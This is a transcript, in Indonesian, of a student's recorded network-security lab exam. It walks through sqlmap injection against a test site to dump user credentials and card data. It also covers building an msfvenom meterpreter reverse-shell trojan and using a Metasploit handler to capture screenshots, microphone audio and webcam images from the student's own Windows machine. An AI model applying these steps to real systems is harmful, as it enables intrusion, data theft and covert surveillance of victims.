Baik, bismillahirrahmanirrahim. Assalamualaikum warahmatullahi wabarakatuh. Perkenalkan, nama saya Surya Setisya Putra. Saya dari kelas D3TT 4202. Jadi pada video kali ini saya akan membuat sebuah video mengenai uji kom praktikum Kamjar tahun 2020. Jadi di sini ada dua modul yang diuji komkan. Pertama, uji kom mengenai SQL injection, dan yang kedua uji kom mengenai Metasploit. Nah, berikut soal yang diberikan. Jadi di sini yang pertama kita akan mengakses sebuah website testing pada Kali Linux. Kemudian kita akan coba melakukan beberapa langkah sesuai yang sudah diajarkan untuk tahap SQL injection. Nah, yang kedua, saya akan mencoba memberikan sebuah file Trojan pada Windows saya. Kemudian kita akan mengambil foto aktivitas dari webcam, foto desktop, kemudian rekaman mikrofon. Baik, kita langsung masuk saja. Yang pertama kita masuk ke terminal. Kita masuk sebagai super user. Nah, setelah itu langkah pertama kita akan membuka website terlebih dahulu, website yang digunakan sebagai percobaan atau simulasi SQL injection, Firefox. Nah, kemudian setelah itu kita akan masuk ke dalam file atau ke dalam website. Ini dia nama websitenya. Kita masuk. Nah, tugas kita yang pertama pada website ini, cari dulu celah yang terdapat pada website tersebut, website yang akan kita coba lakukan hacking. Kita akan coba cari terlebih dahulu. Saya tadi sempat coba-coba dan sudah menemukan di mana celah. Nah, di sini kita dapat melihat bagian URL-nya. Kita dapat melihat di sini ada celah. Langsung saja kita proceed, kemudian kita masuk ke terminal. Nah, perintah yang pertama itu SQL map min u. Kita masukin deh linknya yang tadi. Nah, setelah itu komennya min dbs. Jadi komen kali ini akan menampilkan sebuah database yang tertera pada website tersebut. Di sini juga kita diminta untuk mencari sebuah user yang sudah digunakan agar kita ketika berada di websitenya tinggal join saja. Nah, di sini terlihat terdapat dua database. Yang pertama ada Aquart, yang kedua ada Information Schema. Nah, mulai dari pertama saya akan mencoba masuk ke database yang Aquart dengan komen mirip yang tadi, namun kita akan coba ganti DBS-nya dengan tables, kemudian kolom. Nah, di sini kita tambah lagi nama database-nya min Aquart. Enter. Maaf, tipe kolom. Wait, tables. Ya, tipe tables. Nah,
kita sekilas dapat melihat ketika di running itu dia memperlihatkan beberapa database yang terdapat di Aqua tersebut. Nah, kebetulan di sini kita pertama kali mencoba langsung mendapatkan tabel dari user. Nah, kita kan tugasnya mencari user untuk bisa login ke dalam website tersebut. Nah, yang berhubungan dengan user pasti ada registrasi, nama, username, kemudian password. Kemudian dengan langkah selanjutnya masih dengan awalan yang sama, kita akan hapus bagian sini, mulai dari table sampai kolom kita hapus karena kita udah mendapatkan kolom mana, tabel mana yang terdapat kategori-kategori user. Setelah itu kita masukkan min dan kemudian min d aqua min t users. Ini users ini nama dari tabel users. Kita akan masuk, kita enter. Kita tunggu beberapa saat. Nah, kita coba no aja, no lagi, karena ketika di yes itu akan muncul banyak update mengenai website tersebut, apalagi database-nya akan memakan waktu yang cukup lama. Seperti itu. Apabila sudah selesai, kita cek dulu. Nah, ini kita sudah menemukan username dan passwordnya. Setelah itu, kita akan coba ke menu sign up di website tersebut. Yang pertama itu username-nya apa tadi? Username-nya tes, passwordnya juga tes. Pertama kita masukkan tes, yang kedua tes, login. Oh, wait. Tes. Nah, kita langsung siapa sih yang memiliki email tes dan tes tersebut aslinya. Nah, ini dia merupakan namanya Joseph. Di sini ada emailnya, kemudian nomor kredit kartu kreditnya, di sini juga ada nomor HP-nya. Kita juga dapat melihat alamatnya sebagai contoh seperti itu. Nah, bagaimana sih cara membuktikan kalau misalkan email tersebut yang sudah tadi kita masukkan benar atau salah? Coba kita refresh dulu. Kemudian, nah, kita misalkan masukkan ABC atau apapun, password kita asal login. Nah, kalau seperti ini, kalau kita stuck di halaman login seperti ini, berarti tandanya kita gagal untuk masuk ke passwordnya. Tapi apabila kita masukkan username tes dan passwordnya tes, nah, itu tandanya berarti sudah benar. Nah, mungkin untuk SQL injection sudah dicukupkan. Kemudian kita lanjut ke soal nomor 2. Soal nomor 2 ini tertera Anda adalah seorang hacker. Lakukan penyelundupan komputer target dan Jadi di sini saya merupakan seorang hacker. Itu kita close saja. Kemudian yang pertama itu kita akan melakukan pembuatan file Trojan. Namun
saya sudah membuat filenya nih di praktikum sebelumnya, makanya saya tidak akan membuat file tersebut. Mungkin langkahnya akan saya beritahu. Jadi mungkin langkahnya itu, oh ya, kita kalau untuk membuat file Trojan, kita masuk ke Metasploit Framework, kan lebih mudah. Nah, tunggu beberapa saat melakukan proses. Nah, kita sudah masuk ke halaman Metasploit Framework 5. Jadi di sini itu versinya versi kelima, Metasploit versi yang kelima. Nah, di sini kita akan memasukkan komen yaitu msf venom, kemudian min-p. Ini dilakukan ketika kita akan membuat file Trojan. msf venom min-p Windows slash meter slash lagi reserve recipe. Kita masukkan localhost 192. Ini IP-nya ya, IP kita masing-masing. Jadi saya udah coba config sebentar. If config 92 168 227 129 227 129 227 129 227 129. Kemudian untuk portnya kita memasukkan port 4444 sesuai diperhitungkan. Kenapa 444? Karena port ini TCP dan UDP melayani servisnya itu di software, dia bentuknya aplikasi. Kemudian ini juga bisa digunakan untuk file Trojan, malware dari Trojan. Nah, kemudian setelah itu min e ini kali 86 ini spesifikasi dari komputer kita sendiri. Kemudian Chikata 9, kemudian min f x row slash home slash kali ini user kita, kemudian slash desktop. Kita akan meletakkan file tersebut di desktop nanti setelah selesai, dan nama filenya apapun terserah. Saya akan memberi nama di sini backdoor 2.exe. Nah, karena saya sudah menginstal, jadi saya tidak akan menginstal lagi seperti itu. Kemudian, nah setelah selesai, di sini saya akan melakukan saya akan coba
saya akan mencoba melakukan sebuah hacking pada laptop target. Di sini saya akan jadikan Windows saya sebagai target sendiri. Di sini juga saya sudah mendownload file backdoor sebelumnya. Nah, seperti itu. Di sini langkah pertama saya akan coba masuk dulu nih ke exploit. Jadi kita masuk ke konsolnya dari ini sudah masuk konsol nih, konsol dari Metasploit. Kemudian kita akan menjalankan beberapa perintah yang ada di Metasploit. Use exploit /multi /handler enter. Nah, dan udah masuk ini using configure payload general dan sebagainya. Nah, kemudian di sini kita akan masukkan komen set. Kita akan melakukan setting dulu, setting payloadnya. Set payload Windows. Set payload Windows /meterpreter. Meterpreter ini jadi nanti ada sebuah menu di mana meterpreter ini namanya meterpreter yang dapat menjalankan perintah yang ingin kita eksekusi untuk si target, seperti itu. Meterpreter, kemudian /reserve underscore TCP. Kemudian kita enter. Value specific the payload. Set payload Windows meterpreter. Sebentar. Saya mohon maaf baru karena tulisannya salah. Reverse typo. Enter. Nah, sudah kan. Kemudian kita masukkan dulu nih localhost-nya. Localhost itu IP kita sebagai IP kita. Lhost. Kemudian IP-nya nih yang tadi 192.168.227.129 enter. Nah, kemudian kita akan save juga di bagian portnya, lokal portnya. Nah, kita akan masukkan 4444 dan kita enter. Dan setelah itu kita akan menggunakan exploit, fungsi di mana kita akan mengeksekusi pada target. Nah, setelah start nih, kemudian kita Nah, setelah diinstal kan, setelah terinstall tadi kita kepada komputer target, otomatis akan seperti ini. Kemudian langkah pertama itu kita disuruh dan peroleh data berupa foto aktivitas pengguna melalui webcam. Baik, saya akan coba. Bismillah, semoga lancar. Oh iya, untuk mengetahui kita dapat melakukan apa aja sih melalui meterpreter exploit ini, pada Metasploit ini kita dapat melihat di menu help. Nah, jadi di sini kita nih dapat melihat perintah-perintah yang dapat kita lakukan. Nah, komennya yang pertama ada record my, kedua webcam chat, yang ketiga ada webcam list, webcam snap, kemudian terakhir webcam stream. Jadi di sini kita akan menggunakan webcam take a snapshot from specified list webcam. Coba kita akan menggunakan webcam snap yang pertama. Webcam snap. Terjadi error. Kemudian saya coba yang kedua aja dulu ya. Kedua, foto desktop pengguna. Nah, jadi foto desktop pengguna jatuhnya berarti masuk ke
screenshot. Nah, di sini tidak hanya melalui webcam saja, tapi banyak komen-komen yang dapat kita lakukan untuk center target tuh. Ketika kalian hanya butuh memasukkan komen help, kemudian akan muncul list komen yang ada. Oke, screenshot. Nah, tadi saya menulis screenshot. Nah, user interface comment. Jadi user interface itu bagian layar atau desktop yang interface-nya langsung seperti itu. Nah, di sini yang kedua tadi diminta untuk screenshot desktop. Nah, di sini ada screenshot. Grab a screenshot of the interactive desktop. Nah, kemudian kita akan coba screenshot. Enter. Semoga bisa. Error. Screenshot. Error running comment screenshot. Timeout error operation timeout. Baik, sepertinya memang error. Kemudian yang terakhir kita akan mencoba rekaman mikrofon. Kita cari dulu listnya. Wait, mic. Record audio from record underscore the session one close session die. Apa tadi? Mic record mic record underscore mic unknown comment record mic. Sorry. Kita keluar tadi sessionnya sudah habis di bagian metadata ini, jadi kita masuk exploit lagi. Enter. Nah, coba masuk nih. Kita coba masuk. Wait. Oke, sudah kita masuk ke metadata lagi. Kita coba record mic. Starting. Nah, sudah disimpan nih dikali. Record mic bisa. Coba kita akan coba screenshot. Bismillah. Nah, screenshot juga sudah tersimpan. Kemudian satu lagi ada webcam snap. Nah, ini webcam snap yang masih terdapat error. Sebentar, saya masih penasaran kenapa bisa. Apa perlu saya mengaktifkan kamera di Windows? Saya akan coba. Kamera. Namun sebenarnya kamera juga sudah saya gunakan untuk merecord di Bandicam. Atau mungkin fungsinya tidak berjalan karena bertabrakan, saya tidak tahu. Kita tunggu beberapa saat. Sambil menunggu mungkin akan saya pause. Nah, setelah dibuka tadi memang benar ternyata kamera saya sedang bertabrakan dengan recording. Jadi akan saya minimize saja. Kita akan masuk sini. Kemudian coba ya. Semoga saja bisa.
untuk webcam startnya webcam snap. Tidak bisa, saya tidak tahu kenapa. Baik, kita akan buka dulu nih file yang screenshot dulu. Ada di home kali, nah di home dikali, coba kita mana ya, file mana ya, di sini sepertinya file system kah atau di home, file dikali ya, dikali kemudian dengan kayak bukan ini, file kali home kali, di home dikali terus, oh ini dia nih. Yang pertama tadi ada apa namanya, screenshot, namanya itu oxbnning jpeg, oxbn, kita lihat oxbn, kita buka screenshotnya. Nah ini tadi yang saya screenshot di laptop saya sendiri yang barusan saya lakukan. Mengapa tampilannya Kali Linux ya, karena saya sedang membuka Kali Linux seperti itu. Kemudian yang kedua, kita akan melakukan cek pada record mic home kali mnkdt, masih di dalam satu folder yang sama, mnk. Ini dia, kita akan coba. Oh, hanya beberapa detik saja. Oh, jadi hanya kurang lebih 1 detik mungkin saya tadi melihatnya. 1 detik. Saya tidak tahu mengapa tidak dalam jangka waktu yang durasi yang lama. Tadi ketika kita memasukkan komennya pun perintah tersebut langsung terhenti. Mana tadi? Nah, di sini tidak lama kemudian dia langsung stop seperti itu. Nah, tinggal satu nih, lagi satu webcam snap, si tetap tidak bisa. Atau kita akan menggunakan komen yang lain, webcam chat, start list webcam, play a video stream, snap. Ya, webcam list ya, saya penasaran. Masuk webcam listnya. Webcam list, webcam snap, webcam stream sama chat, webcam chat. Error webcam stream, error juga. Ya, terdapat error sepertinya. Seperti itu. Sandbox second. Ini saya tidak mau tahu mengapa ada operation fail 2147943 850. waiting play. Sudah, saya akan close. Proses saja. Saya masih penasaran dengan webcam snap, tapi tidak bisa. Coba kita exit. Nah, kemudian kita masuk lagi ke exploit.
webcam snap, tetap tidak bisa. Saya sudah coba searching mengapa webcam snapnya tidak bisa digunakan. Membutuhkan waktu yang lama mungkin untuk troubleshoot. Maka dari itu mungkin saya sudah baca ini, sebelumnya saya sudah mencoba. Seperti itu. Mungkin saya akan coba troubleshooting terlebih dahulu. Baik, saya sudah melakukan troubleshooting dan melihat video yang ada. Sebelum ini saya sudah melihat video sebelum pengajian ini, sudah melihat video bermasalah juga, namun ketika saya buka lewat manual, lewat .html, file .html, tetap tidak muncul kamera. Baik, mungkin sekian video uji KOM 3 praktikum keamanan jaringan tahun 2020 saya buat. Saya Surya Putra, mohon maaf apabila banyak kesalahan dan kekurangan dalam pengerjaan. Terima kasih banyak atas perhatiannya. Assalamualaikum warahmatullahi wabarakatuh.